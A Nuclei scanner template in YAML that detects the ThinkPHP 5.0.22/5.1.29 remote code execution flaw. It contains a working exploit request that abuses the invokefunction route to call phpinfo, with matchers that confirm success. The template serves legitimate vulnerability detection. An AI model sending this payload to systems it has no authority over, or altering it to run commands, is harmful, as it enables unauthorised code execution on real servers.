nuclei-templates/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml

30 lines
980 B
YAML
Raw Normal View History

id: thinkphp-5022-rce
info:
name: ThinkPHP - Remote Code Execution
author: dr_set
severity: critical
description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
tags: thinkphp,rce
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition: and
- type: status
status:
- 200